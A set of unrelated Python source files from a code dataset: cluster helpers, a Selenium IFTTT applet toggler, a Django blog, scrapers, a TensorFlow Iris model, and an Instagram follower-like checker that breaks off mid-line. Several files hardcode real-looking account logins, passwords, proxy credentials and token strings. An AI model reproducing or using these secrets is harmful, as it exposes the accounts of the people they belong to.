add_node(self,c_id):\n node_req=c_id\n add_node = c.node_add(node_req)\n return add_node\n\n def list_node(self,c_id):\n list_ele = {}\n list_func = self.info_cluster(c_id)\n if list_func.get('nodes') != None:\n for list_n in list_func.get('nodes'):\n list_ele.update({'Cluster':list_func.get('id'),'Id':list_n})\n return list_ele\n\n def list_volume(self):\n list = c.volume_list()\n return list\n\n def info_volume(self,v_id):\n info = c.volume_info(v_id)\n print('volume',info)\n return info\n\n\nclass Get_Heketi(Test_Heketi):\n def get_cluster(self):\n cluster_list = self.list_cluster()\n return cluster_list\n\n def get_node(self,cid):\n node_list = json.dumps(self.list_node(cid))\n return node_list\n\n\nclass Save_Data(Test_Heketi):\n def save_func(self):\n for app_name in site.registered_admins:\n admin_class = site.registered_admins[app_name]\n return admin_class\n\n\n def save_cluster(self):\n admin_class = self.save_func().get('heketi_cluster')\n logger('获取cluster列表')\n cluster_id = self.list_cluster()\n logger('Cluster ID获取成功')\n logger('准备保存ClusterID')\n for cid in cluster_id.get('clusters'):\n logger('检查ClusterID是否存在')\n check_id = self.check_cluster_id(cid)\n logger('ClusterID检查完毕')\n if check_id:\n logger('ClusterID不存在,开始执行保存')\n admin_class.model.objects.create(cid=cid)\n logger('ClusterID已保存')\n return True\n\n def check_cluster_id(self,cid):\n admin_class = self.save_func().get('heketi_cluster')\n model_class = admin_class.model.objects.all()\n if not model_class:\n logger('数据库是空的,不需要检查')\n return True\n cluster_id = []\n for c_id in model_class.values('cid'):\n logger('获取数据库中已有ClusterID')\n cluster_id.append(c_id.get('cid'))\n\n logger('匹配已有ClusterID')\n if cid in cluster_id:\n logger('ClusterID存在数据库中,不保存数据')\n return False\n else:\n return True","sub_path":"cloudfly_heketi/packaged/heketis.py","file_name":"heketis.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"273343656","text":"#### This script should enable the applets that are non-conflicting.\n#### For example, the applet choose a TS, trigger and an AS , action\n#### The applets enabled should be only the particular trigger from the selected TS\n#### Every other appplet should be diabled to avoid chain applet executions and\nimport requests\nimport time\nimport timeit\nfrom threading import Thread\nimport time\nfrom pprint import pprint\nfrom pymongo import MongoClient\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.firefox.service import Service\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nthreads = []\nactive_trigger = ''\nactive_trigger_service = ''\nresults = {}\ntrigger_fields_of_active_trigger = ''\naction_details_list = []\ntrack_action_services = []\n#############################################################################################\n# ENABLE A SET OF APPLETS FOR A CHOSEN TRIGGER AND TRIGGER SERVICE\n#############################################################################################\n###########################################################################\n# c2436a9ef37d65910c1c05f6d137dbb7d79260d4 wijitha.mahadewa@gmail.com\n# 0dfb5edac5e2201a9ece7b3908dcfd04d57522b6 happybee9494@gmail.com\n# 1b004674987164ecf6ed87c30146aa90b4c21024\n###########################################################################\nuri = 'mongodb://127.0.0.1:27017'\nclient = MongoClient(uri)\ndbClient = client['applets']\nappletcollection = dbClient.get_collection('appletcollection')\nall_applet_details = appletcollection.find({})\n############################################# LOGIN TO IFTTT # #########################################################\noptions = Options()\noptions.add_argument('--headless')\ncap = DesiredCapabilities().FIREFOX\ncap[\"marionette\"] = False\nserv = Service(r'/root/Tools/Firefox/geckodriver')\nbrowser = webdriver.Firefox(capabilities=cap, service=serv,options=options)\nbrowser.get('https://ifttt.com/login?wp_=1')\n\nusername = browser.find_element_by_id(\"user_username\")\npassword = browser.find_element_by_id(\"user_password\")\nusername.send_keys(\"happybee9494@gmail.com\")\npassword.send_keys(\"happyBEE@94\")\nbrowser.find_element_by_name(\"commit\").click()\nprint('Logged In')\n########################################################################################################################\ndef genURLPart(applet_id,applet_title):\n clean_applet_title = applet_title.strip().lower()\n clean_applet_title = clean_applet_title.replace('@','-').replace(',','').replace('.','-').replace(\"'\",\"-\")\n clean_applet_title = clean_applet_title.replace(' ', '-')\n clean_applet_title = clean_applet_title.replace('--', '-')\n genURL = str(applet_id)+ \"-\"+clean_applet_title\n # print(genURL)\n return genURL\n\ndef toggleAppletConnection(applet_id,applet_title):\n print('toggleAppletConnection')\n applet_connect_url = genURLPart(applet_id, applet_title)\n browser.get('https://ifttt.com/applets/' + str(applet_connect_url))\n time.sleep(10)\n element = WebDriverWait(browser, 100).until(EC.element_to_be_clickable((By.CLASS_NAME, \"connect_button__connect-button__3_96C\")))#.send_keys(Keys.RETURN)\n element.click()\n time.sleep(10)\n ## TODO: can check if a text exist on the resulting page to confirm\n return\n\ndef toggleApplet(active_trigger,active_trigger_service,appletData,track_action_services,action_details_list,trigger_fields_of_active_trigger,attempt):\n action_details = {}\n if (appletData['trigger'].strip() == active_trigger.strip()) and (\n appletData['trigger_service'].strip() == active_trigger_service.strip()):\n print('Enabling realted applet ... ')\n trigger_fields_of_active_trigger = appletData['trigger_fields']\n action_details['action_service'] = appletData['action_service']\n action_details['action'] = appletData['action']\n action_details['action_desc'] = appletData['action_desc']\n action_details['action_fields'] = appletData['action_fields']\n track_action_services.append(appletData['action_service'])\n # print(track_action_services)\n # print(track_action_services.count(appletData['action_service']))\n if track_action_services.count(appletData['action_service']) == attempt:\n ##################################################################################################################\n ########## If applet already enabled contine, otherwise toggle and update database ###############################\n action_details_list.append(action_details)\n if appletData['eanbled']:\n return track_action_services, action_details_list, trigger_fields_of_active_trigger\n else:\n toggleAppletConnection(appletData['applet_id'], appletData['applet_title'])\n newStatus = True\n else:\n print('Diableing not realted applet ... 1')\n ##################################################################################################################\n ########## If applet already disabled contine, otherwise toggle and update database #############################\n if appletData['eanbled']:\n toggleAppletConnection(appletData['applet_id'], appletData['applet_title'])\n newStatus = False\n else:\n return track_action_services, action_details_list, trigger_fields_of_active_trigger\n\n else:\n print('Diableing not realted applet ... 2')\n ##################################################################################################################\n ########## If applet already disabled contine, otherwise toggle and update database #############################\n if not appletData['eanbled']:\n toggleAppletConnection(appletData['applet_id'], appletData['applet_title'])\n newStatus = False\n else:\n print('not enabled')\n return track_action_services, action_details_list, trigger_fields_of_active_trigger\n\n doc = {\n 'applet_id': appletData['applet_id'],\n 'applet_title': appletData['applet_title'],\n 'applet_desc': appletData['applet_desc'],\n 'trigger_service': appletData['trigger_service'],\n 'trigger': appletData['trigger'],\n 'trigger_desc': appletData['trigger_desc'],\n 'trigger_fields': appletData['trigger_fields'],\n 'action_service': appletData['action_service'],\n 'action': appletData['action'],\n 'action_desc': appletData['action_desc'],\n 'action_fields': appletData['action_fields'],\n 'eanbled': appletData['eanbled']\n }\n updateddoc = {\n 'applet_id': appletData['applet_id'],\n 'applet_title': appletData['applet_title'],\n 'applet_desc': appletData['applet_desc'],\n 'trigger_service': appletData['trigger_service'],\n 'trigger': appletData['trigger'],\n 'trigger_desc': appletData['trigger_desc'],\n 'trigger_fields': appletData['trigger_fields'],\n 'action_service': appletData['action_service'],\n 'action': appletData['action'],\n 'action_desc': appletData['action_desc'],\n 'action_fields': appletData['action_fields'],\n 'eanbled': newStatus\n }\n appletcollection.update(doc, updateddoc, upsert=True)\n print('db updated')\n return track_action_services,action_details_list,trigger_fields_of_active_trigger\n\ndef enableOnlyRequiredApplets(trigger, trigger_service, attempt):\n s1 = timeit.default_timer()\n active_trigger = trigger\n active_trigger_service = trigger_service\n i = 0\n for appletData in all_applet_details:\n i = i + 1\n if i <= 2000:\n continue\n if i%20 == 0:\n time.sleep(25)\n\n print('came here ' + str(i))\n process = Thread(target=toggleApplet,args=[active_trigger, active_trigger_service, appletData, track_action_services, action_details_list,trigger_fields_of_active_trigger,\n attempt])\n process.start()\n threads.append(process)\n e1 = timeit.default_timer()\n print('Time for diff library function= ' + str(e1 - s1))\n\n for process in threads:\n process.join()\n\n results['active_trigger'] = active_trigger\n results['active_trigger_service'] = active_trigger_service\n results['trigger_fields_of_active_trigger'] = trigger_fields_of_active_trigger\n results['action_details_list'] = action_details_list\n print('final results: ')\n print(results)\n return results\n\n\n\n\n\n","sub_path":"Phase2AppletExecution/AppletEnabler.py","file_name":"AppletEnabler.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409079353","text":"from selenium import webdriver\nfrom pages.home.login_page import *\nfrom utilities.custom_logger import LogGen\nimport logging\nimport pytest\nfrom utilities.teststatus import TestStatus\n\n@pytest.mark.usefixtures(\"oneTimeSetUp\",\"setUp\")\nclass Test_001_Login():\n\n @pytest.fixture(autouse=True)\n def class_setup(self,oneTimeSetUp):\n self.lp = Login_page(self.driver)\n self.ts = TestStatus(self.driver)\n\n\n # @pytest.mark.run(order=2)\n def test_validLogin(self):\n self.lp.login(\"admin@yourstore.com\", \"admin\")\n # logger = LogGen.loggen()\n result1 = self.lp.verifyTitle()\n self.ts.mark(result1, \"Title Verified\")\n result2 = self.lp.verify_login_successful()\n self.ts.final_mark(\"test_validLogin\", result2, \"Login was successful\")\n\n self.lp.logout()\n\n # @pytest.mark.run(order=1)\n def test_invalidLogin(self):\n self.lp.login(\"admin@yourstore.com\", \"admin1\")\n response = self.lp.verify_login_failed()\n assert response == True","sub_path":"tests/home/login_tests.py","file_name":"login_tests.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12333799","text":"# -*- coding: utf-8 -*-\r\n\r\n'''\r\n#:::::::::::::::::::::#\r\n#:'######':'########':#\r\n#::: ## :::::: ## ::::#\r\n#:.. ## :::::: ## ::::#\r\n#::: ## :::::: ## ::::#\r\n#::: ## :::::: ## ::::#\r\n#::: ## :::::: ## ::::#\r\n#: ###### :::: ## ::::#\r\n#:::::::::::::::::::::#\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n'''\r\n\r\nimport json\r\nimport os\r\nimport traceback\r\n\r\nfrom resources.lib.modules import client, control, log_utils\r\n\r\n\r\nclass jsonMenu(object):\r\n def __init__(self):\r\n # Default root locations, if none is set by the indexer\r\n self.local_root = os.path.join(control.addonPath, 'menu')\r\n self.menu = None\r\n\r\n self.agent = 'MTNDbG93bnMgSlNPTiBNZW51'[1:].decode('base64')\r\n\r\n def load(self, menu_file):\r\n if 'http' in menu_file:\r\n try:\r\n header = {'User-Agent': self.agent}\r\n response = client.request(menu_file, headers=header)\r\n self.menu = json.loads(response)\r\n except Exception:\r\n failure = traceback.format_exc()\r\n log_utils.log('jsonMenu - Open Remote Exception: \\n' + str(failure))\r\n else:\r\n try:\r\n menu_file = os.path.join(self.local_root, menu_file)\r\n fileref = control.openFile(menu_file)\r\n content = fileref.read()\r\n fileref.close()\r\n self.menu = json.loads(content)\r\n except Exception:\r\n failure = traceback.format_exc()\r\n log_utils.log('jsonMenu - Open Local Exception: \\n' + str(failure))\r\n","sub_path":"Repository/script.module.miamigrice/lib/resources/lib/modules/jsonmenu.py","file_name":"jsonmenu.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"176891264","text":"from base import *\nfrom devices import *\nimport time\n\nclass Hexiwear(Board):\n ids_vendor = {\n \"0D28\":frozenset((\"0204\",))\n }\n\n @staticmethod\n def match(dev):\n return dev[\"vid\"] in Hexiwear.ids_vendor and dev[\"pid\"] in Hexiwear.ids_vendor[dev[\"vid\"]]\n\n def reset(self):\n pass\n\n def burn(self,bin,outfn=None):\n fname = fs.get_tempfile(bin)\n if not self.disk:\n return False,\"Can't find device disk! Have you mounted the DAP Link device?\"\n fs.copyfile2(fname,fs.path(self.disk,\"hexiwear.bin\"))\n fs.del_tempfile(fname)\n # wait some time to allow virtualization\n time.sleep(15/256*(len(bin)/1024))\n return True,\"Ok\"\n","sub_path":"hexiwear.py","file_name":"hexiwear.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510759201","text":"from back.model import Artist\nfrom front.view_util import display\nfrom validate import validate_name, validate_Art, validate_Email\n\nimport re\n\n\nclass View():\n\n def __init__(self, view_model):\n self.view_model = view_model\n\n def make_menu(self):\n while True:\n choice = input('Would you like to...\\n1.Add A New Artist\\n2.Add A New Piece\\n3.Search For Art From A Specific Artist\\n4.Search For All Art From All Artists\\n5.Update The Availability Of A Peice\\n6.Delete A Peice\\nQ.Quit\\n')\n print()\n if choice == '1':\n add_new_artist(self)\n elif choice == '2':\n add_new_art(self)\n elif choice == '3':\n srch_art_one_artist(self)\n elif choice == '4':\n srch_art_all_artist(self)\n elif choice == '5':\n update_available(self)\n elif choice == '6':\n delete_art(self)\n elif choice.upper() == 'Q':\n print('\\nThanks for using the Art Database\\n')\n break\n else:\n print('Please choose a valid menu option, numbers 1-6 or Q for Quit.\\n')\n\n# ADD ARTIST\ndef add_new_artist(self, name=''):\n # Input Validation\n \n isFound = ''\n if name=='':\n name = input('What is the name of the artist? ')\n name = validate_name(name)\n isFound = search_artist(self, name, first=True)\n\n if isFound == None:\n email = input(f\"What is {name}'s email? \")\n email = validate_Email(email)\n self.view_model.insert(name, email)\n data = self.view_model.search_artist(name)\n display(data, first=True)\n else:\n print(f\"{name} is already in the system.\\n\")\n\n# ADD NEW ART\ndef add_new_art(self):\n artist = input('What is the name of the artist? ')\n name = validate_name(artist)\n isFound = search_artist(self, artist, first=True)\n\n # Verifying that the artist exists in the database before adding art to their name\n if isFound==None:\n print(f\"{artist} isn't in the system yet please add them first.\")\n add_new_artist(self)\n\n name = input('What is the name of the piece? ')\n data = self.view_model.search_art_name(name)\n if data.exists()!=False:\n print(f\"There is already a piece with the name of {name} in the system\")\n return\n price = input('What is the price of the piece? ')\n available = input('Is this piece sold? ')\n\n name, price, available = validate_Art(name, price, available)\n\n self.view_model.insert_art(name, artist, price, available)\n data = self.view_model.search_art_name(name)\n display(data)\n\n# SEARCH ART FROM ONE ARTIST\ndef srch_art_one_artist(self):\n name = input('What is the name of the artist? ')\n name = validate_name(name)\n isFound = search_artist(self, name)\n\n # Verifying that the artist exists in the database\n if isFound.exists()==None:\n print(f\"{name} isn't in the system yet, maybe try again.\")\n return\n data = self.view_model.search_art_one(name)\n display(data)\n\n# SEARCH ALL ART\ndef srch_art_all_artist(self):\n data = self.view_model.search_art_all()\n display(data)\n\n# UPDATE\ndef update_available(self):\n name = input('What is the name of the artwork whos availability has changed? ')\n data = self.view_model.search_art_name(name)\n\n if data.exists() == False:\n print('Sorry that artwork does not exist')\n return\n for dat in data:\n available = dat.available\n\n rows_updated = self.view_model.update(name, available)\n\n if rows_updated == 0:\n print('There was an error. Your request was not updated')\n return\n\n data = self.view_model.search_art_name(name) \n display(data) \n\n# DELETE\ndef delete_art(self):\n name = input('What is the name of the artwork you would like to delete? ')\n name = validate_name(name)\n isFound = self.view_model.search_art_name(name)\n # Verifying that the art exists in the database\n if isFound.exists()==None:\n print(f\"{name} isn't in the system yet, maybe try again.\")\n return\n display(isFound)\n confirm = input('Are you sure you want to delete this art? (Yes er no?) ')\n while True:\n if confirm.upper()=='YES':\n rows_updated = self.view_model.delete(name)\n if rows_updated == 0:\n print('There was an error. Your request was not deleted\\n')\n else:\n print('Your entry was deleted.\\n')\n break\n elif confirm.upper()=='NO':\n print('Fair enough')\n break\n else:\n confirm=input(\"That's not an actual choice. Try again.\")\n\n# SEARCH ARTIST\ndef search_artist(self, name, first=False):\n data = self.view_model.search_artist(name)\n \n # Displaying search results\n if data.exists() == False:\n return None\n for dPoint in data:\n return dPoint","sub_path":"front/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"645379470","text":"import multiprocessing\n\nfrom video_reader import net_sock_server\nfrom video_reader import process\nfrom video_reader import video_reader\n\n\nclass VideoPacketNetSocketReader(video_reader.VideoPacketReader):\n def __init__(self, port=9526):\n self._data_pipe_r, self._data_pipe_w = multiprocessing.Pipe(False)\n self._ack_pipe_r, self._ack_pipe_w = multiprocessing.Pipe(False)\n self._semaphore = multiprocessing.BoundedSemaphore(1) # no concurrency allowed\n self._server_process = process.ServerProcess(\"video packet net socket reading process\",\n net_sock_server.video_net_socket_reader_server,\n self._data_pipe_w, self._ack_pipe_r, self._semaphore, port)\n ret = self._server_process.start()\n if ret:\n print(\"%s is running\" % self._server_process.name())\n\n print(\"net socket based video packet reader created, port = %d\" % port)\n\n def read(self):\n try:\n rtp_pkt = self._data_pipe_r.recv()\n except EOFError: # write pipe connection closed\n print(\"BUG: write pipe connection should not be closed before reader release\")\n return False, None\n except Exception as e:\n print(\"failed to receive video packet from the pipe: %s\" % str(e))\n return False, None\n\n try:\n self._ack_pipe_w.send(\"\")\n except ValueError as e:\n print(\"WARN: failed to send ack to the pipe: %s\" % str(e))\n\n return True, rtp_pkt\n\n def release(self):\n self._server_process.stop();\n\n self._data_pipe_r.close()\n self._data_pipe_w.close()\n self._ack_pipe_r.close()\n self._ack_pipe_w.close()\n\n print(\"net socket based video packet released\")\n","sub_path":"src/main/resources/riverrun-noarch/VideoEmitterFunction/video_reader/net_sock.py","file_name":"net_sock.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"572577635","text":"from django.shortcuts import render, get_object_or_404 ,redirect\nfrom django.utils import timezone\nfrom .models import Post\nfrom .forms import PostForm\nfrom django.http import HttpResponse\n\ndef post_list(request):\n \n language = 'en-gb'\n session_language = 'en-gb'\n if 'lang' in request.COOKIES:\n language = request.COOKIES['lang'] \n if 'lang' in request.session:\n session_language = request.session['lang']\n \n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n return render(request, 'blog/post_list.html', {'posts': posts ,'language': language ,'session_language': session_language})\n\ndef post_detail(request, pk):\n post = get_object_or_404(Post, pk=pk)\n return render(request, 'blog/post_detail.html',{'post':post})\n\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = PostForm()\n return render(request, 'blog/post_edit.html', {'form': form})\n\ndef post_edit(request, pk):\n post = get_object_or_404(Post, pk=pk)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = PostForm(instance=post)\n return render(request, 'blog/post_edit.html', {'form': form})\n\ndef language(request, language='en-gb'):\n response = HttpResponse('Setting language to %s' %language)\n response.set_cookie('lang',language)\n request.session['lang'] = language\n return response\n\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"565087676","text":"from urllib.parse import urljoin\r\nfrom functools import reduce\r\nimport operator\r\nimport re\r\n\r\nfrom .core import *\r\nfrom .vparsers import *\r\nfrom .utils import attributeerror_wrapper\r\n\r\n\r\nclass NowaInspiracjaParser(\r\n SingleSourceMixin, SingleRequestLoaderMixin, BaseParser\r\n):\r\n middlewares = [ DecodeMiddleware(), BeautifulSoupMiddleware() ]\r\n parsers = {\r\n \"int\": IntParser(), \"float\": FloatParser(), \"price\": PriceParser()\r\n }\r\n\r\n url = \"http://blockpol.pl/invest/nowa-inspiracja/wyszukiwarka/\"\r\n method = \"GET\"\r\n headers = {\r\n \"Host\": \"blockpol.pl\",\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Accept-Language\": \"en-US,en;q=0.5\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Connection\": \"keep-alive\",\r\n \"Upgrade-Insecure-Requests\": \"1\"\r\n }\r\n params = {\r\n \"investment\": 472,\r\n \"surface_min\": \"\",\r\n \"surface_max\": \"\",\r\n \"rooms\": \"\",\r\n \"search-submit\": \"Szukaj+mieszkań\",\r\n \"search-id\": \"home1\"\r\n }\r\n \r\n @attributeerror_wrapper(return_value=[])\r\n def find_records(self, soup):\r\n return soup.find(\"div\", {\"class\": \"search-results__list\"})\\\r\n .find_all(\"a\", {\"class\": \"search-result\"})\r\n \r\n def parse_record(self, soup):\r\n record = {\r\n \"number\": self.get_flat_number(soup),\r\n \"plan\": soup.get(\"href\", None),\r\n \"price\": self.parsers[\"price\"](soup.get(\"data-price\", None)),\r\n \"price_m2\": self.parsers[\"price\"](soup.get(\"data-pricepermeter\", None)),\r\n \"area\": self.parsers[\"float\"](soup.get(\"data-surface\", None)),\r\n \"status\": self.parsers[\"int\"](soup.get(\"data-status\", None))\r\n }\r\n record.update(self.get_rooms_and_floor(soup))\r\n return record\r\n\r\n @tryexcept_wrapper((AttributeError, IndexError), return_value=None)\r\n def get_flat_number(self, soup):\r\n return soup.find(\"h3\", {\"class\": \"search-result__header\"})\\\r\n .text.split(\",\")[-1].strip()\r\n\r\n @tryexcept_wrapper((AttributeError, IndexError), return_value={})\r\n def get_rooms_and_floor(self, soup):\r\n lis = soup.find(\"ul\", {\"class\": \"search-result__info\"}).find_all(\"li\")\r\n attrs = [ re.search(\"\\d+\", li.text).group(0) for li in lis[1:-1] ]\r\n return dict(\r\n rooms=self.parsers[\"int\"](attrs[0]),\r\n floor=self.parsers[\"int\"](attrs[1])\r\n )\r\n\r\n def modify_record(self, record, raw_record):\r\n record[\"fid\"] = record[\"number\"]\r\n return record","sub_path":"parsers/nowainspiracja.py","file_name":"nowainspiracja.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"530961373","text":"import tensorflow as tf\nimport numpy as np\nfrom copy import copy\nfrom random import shuffle\n\n\ndef load_iris_data():\n flower_data = []\n label_data = []\n\n labels = []\n features_max = []\n\n print('+ Load data ...')\n with open('data/bezdekIris.data', 'r') as iris_file:\n for line in iris_file.readlines():\n cur_line = [elm.strip() for elm in line.split(',')]\n\n if len(cur_line) == 5:\n cur_label = cur_line[-1]\n if cur_label not in labels:\n labels.append(cur_label)\n\n label_data.append(labels.index(cur_label))\n\n features = [float(elm) for elm in cur_line[:-1]]\n if len(features_max) == 0:\n features_max = [elm for elm in features]\n else:\n for idx, feature in enumerate(features):\n if features_max[idx] < feature:\n features_max[idx] = feature\n\n flower_data.append(features)\n \n features_max = np.array(features_max, np.float64)\n\n flower_data = np.divide(np.array(flower_data, np.float64), features_max)\n ##\n # expand labels (one hot vector)\n tmp = np.zeros((len(label_data), len(labels)))\n tmp[np.arange(len(label_data)), label_data] = 1\n label_data = tmp\n\n print('+ flowers: \\n', flower_data)\n print('+ labels: \\n', label_data)\n\n print('+ loading done!')\n return flower_data, label_data\n\n\ndef batch(data, label, size):\n out_data = []\n out_label = []\n for index, elm in enumerate(data):\n if len(out_data) < size:\n out_data.append(elm)\n out_label.append(label[index])\n else:\n yield out_data, out_label\n out_data = []\n out_label = []\n\n\ndef main():\n images_data, label_data = load_iris_data()\n\n train_percentage = 0.8\n\n train_data = []\n train_labels = []\n\n test_data = []\n test_labels = []\n\n train_size = int(len(images_data) * train_percentage)\n train_count = 0\n num_round = 5\n\n indexes = [_ for _ in range(len(images_data))]\n\n for round_ in range(num_round):\n shuffle(indexes)\n #print(\"+ indexes\", indexes)\n for index in indexes:\n if train_count < train_size:\n train_data.append(copy(images_data[index]))\n train_labels.append(copy(label_data[index]))\n train_count += 1\n else:\n test_data.append(copy(images_data[index]))\n test_labels.append(copy(label_data[index]))\n train_count = 0\n\n print(\"+ train size:\", len(train_data))\n print(\"+ test size:\", len(test_data))\n\n LABEL_SIZE = len(train_labels[0])\n FEATURE_SIZE = len(train_data[0])\n\n # Create the model\n x = tf.placeholder(tf.float32, [None, FEATURE_SIZE])\n W = tf.Variable(tf.zeros([FEATURE_SIZE, LABEL_SIZE]))\n b = tf.Variable(tf.zeros([LABEL_SIZE]))\n y = tf.matmul(x, W) + b\n\n # Define loss and optimizer\n y_ = tf.placeholder(tf.float32, [None, LABEL_SIZE])\n\n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(y, y_))\n train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n sess = tf.InteractiveSession()\n # Train\n tf.initialize_all_variables().run()\n\n step_size = 4\n for batch_xs, batch_ys in batch(train_data, train_labels, step_size):\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n # Test trained model\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n print(\"+ Accuracy: \", sess.run(accuracy, feed_dict={x: test_data,\n y_: test_labels}))\n\n print(\"+ W:\\n{}\".format(sess.run(W)))\n print(\"+ b:\\n{}\".format(sess.run(b)))\n\nif __name__ == '__main__':\n import sys\n sys.exit(int(main() or 0))\n","sub_path":"source_data/test_iris_nn.py","file_name":"test_iris_nn.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"639596933","text":"import io\nsource = \"day1Input.txt\"\nresult = 0\n\n\nf = open(\"day1Input.txt\", 'r')\nstr = f.read(1)\nwhile(str is not \"\"):\n if(str is '('):\n result = result + 1\n elif(str is ')'):\n result = result - 1\n str = f.read(1)\nprint (result)\n\ninput(\" press enter to exit \")\n","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"417593","text":"import os\nimport sys\nimport argparse\nfrom sys import platform # mac or linux\nimport huepy # for color print\nfrom datetime import datetime\nfrom tqdm import tqdm\n\nhello = '''\n _________________________________________\n\n INSTAGRAM TAG checker by @kirillovmr\n _________________________________________\n'''\n\nprint(hello)\n\nif \"darwin\" in platform.lower():\n print(\"\\tЗапущено на платформе MAC OS\\n\")\n path_ = \"/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/instabot\"\nelif \"linux\" in platform.lower():\n print(\"\\tЗапущено на платформе LINUX\\n\")\n path_ = \"/usr/local/lib/python3.5/dist-packages/instabot\"\nelif \"win32\" in platform.lower():\n print(\"\\tЗапущено на платформе WINDOWS\\n\")\n path_ = \"c:\\\\users\\\\user\\\\appdata\\\\local\\\\programs\\\\python\\\\python37\\\\lib\\\\site-packages\\\\instabot\"\nelse:\n print(\"This platform is not supported. Exiting...\")\n exit()\n\ndef console_print(text, color=None):\n if color is not None:\n text = getattr(huepy, color)(text)\n print(text)\n\nsys.path.append(path_)\nfrom instabot import Bot, utils\n\nlogin = \"_friendly_company\"\npassword = \"arina4ever699516\"\nproxy = \"http://oxanaroma:A0z2CkV@31.41.219.235:65233\"\npost_link = \"https://www.instagram.com/p/\"\nresult_filename = 'result.txt'\nvip_filename = 'vip.txt'\n\n# Creating folders\ndir = \"{}/accs/{}/a\".format(path_, login)\ndir0 = \"{}/accs/{}\".format(path_, login)\nif not os.path.exists(dir):\n os.makedirs(dir)\nif not os.path.exists(dir0 + '/tags'):\n os.makedirs(dir0 + '/tags')\n\n# Changing directory to instabot/accs/bot_id\nos.chdir(dir)\n\nbot = Bot()\nbot.login(username=login, password=password, proxy=proxy)\n\n# Creating dict of bad users\nbad_users = {}\n\n# Loading id -> username dict\nfollowers_id_name = {}\ntry:\n f = open('usernames.txt', 'r')\n for line in f:\n split = line.split(':')\n id = split[0]\n # обрезаем \\n\n split2 = split[1].split('\\n')\n username = split2[0]\n followers_id_name[id] = username\n f.close()\nexcept:\n print(\"Loaded file with usernames was not found.\")\n\n# Get list of VIP Users\nvip = bot.read_list_from_file('../' + vip_filename)\n\n# Deleting repeated items\nvip = list(set(vip))\n\n# Converting usernames to id\nvip_id = []\nfor v in vip:\n vip_id.append(bot.convert_to_user_id(v))\n\n# Getting followers\nfollowers = bot.followers\n\n# Removing vip users from followers\nusers_to_check = [x for x in followers if x not in vip_id]\n\nh = bot.get_user_tags_medias(bot.get_user_id_from_username(login))\n# Deleting repeated items\nposts = list(set(h))\n\n# users_to_check = users_to_check[0:180]\n# posts = posts[0:10]\n\n# Получаем список лайков под всеми фото в хештеге\nnew_posts = []\nfor post in tqdm(posts, desc=\"Получаем список лайков\"):\n new_posts.append({'post': post, 'likers': bot.get_media_likers(post)})\n\n# for user in users_to_check:\nfor user in tqdm(users_to_check, desc=\"Проверяем лайки\"):\n for post in new_posts:\n likers = post['likers']\n try:\n likers.index(user)\n except ValueError:\n try:\n bad_users[user][\"num\"] += 1\n if(len(bad_users[user][\"proof\"]) < 2):\n bad_users[user][\"proof\"].append(post['post'])\n except KeyError:\n bad_users[user] = {}\n bad_users[user][\"username\"] = 